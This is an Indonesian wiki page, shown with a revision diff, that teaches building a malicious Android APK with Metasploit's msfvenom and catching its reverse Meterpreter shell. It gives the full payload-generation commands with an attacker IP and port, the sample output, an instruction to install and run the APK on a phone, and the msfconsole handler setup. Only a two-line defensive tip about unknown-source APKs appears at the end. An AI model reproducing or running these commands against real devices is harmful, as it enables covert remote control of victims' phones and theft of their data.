Difference between revisions of "MSF: meterpreter untuk attack android"

From OnnoWiki
Jump to navigation Jump to search
Line 27: Line 27:
 
  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk
 
  msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk
  
* Install & jalankan apk tersebut di smartphone.  
+
 
 +
Akan keluar kira-kira
 +
 
 +
No platform was selected, choosing Msf::Module::Platform::Android from the payload
 +
No Arch selected, selecting Arch: dalvik from the payload
 +
No encoder or badchars specified, outputting raw payload
 +
Payload size: 8784 bytes
 +
 
 +
 
 +
* Install & jalankan apk tersebut di smartphone.
  
 
==Setelah .apk di jalankan==
 
==Setelah .apk di jalankan==

Revision as of 05:43, 1 June 2017

sumber: http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.7S1EA8SV.dpbs


Apakah Android?

Android adalah sistem operasi berbasis kernel Linux, dan dirancang terutama untuk perangkat mobile touchscreen seperti smartphone dan komputer tablet. Awalnya dikembangkan oleh Android, Inc., yang didukung Google secara finansial dan kemudian dibeli pada tahun 2005, Android diresmikan pada tahun 2007 bersamaan dengan berdirinya Open Handset Alliance: sebuah konsorsium perangkat keras, perangkat lunak, dan perusahaan telekomunikasi yang ditujukan untuk meningkatkan standar terbuka untuk seluler.

Apakah APK?

File paket aplikasi Android (APK) adalah format file yang digunakan untuk mendistribusikan dan menginstal perangkat lunak aplikasi dan middleware ke sistem operasi Google Android; Sangat mirip dengan paket MSI di Windows atau paket Deb pada sistem operasi berbasis Debian seperti Ubuntu.

Skenario Serangan

  • Attacker IP address: 192.168.0.209
  • Attacker port to receive connection: 443

Kebutuhan

  • Metasploit framework (menggunakan Kali Linux 2016.2)
  • Android smartphone

Membuat exploit

  • Di CLI Kali Linux, ketik
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection> > hack.apk
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk


Akan keluar kira-kira

No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8784 bytes


  • Install & jalankan apk tersebut di smartphone.

Setelah .apk di jalankan

  • Di CLI Kali Linux
msfconsole
  • Jalankan exploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 443
exploit


Solusi

  • Jangan install APK dari "unknown source"
  • Kalau terpaksa juga, pastikan apk tersebut bersih.


Referensi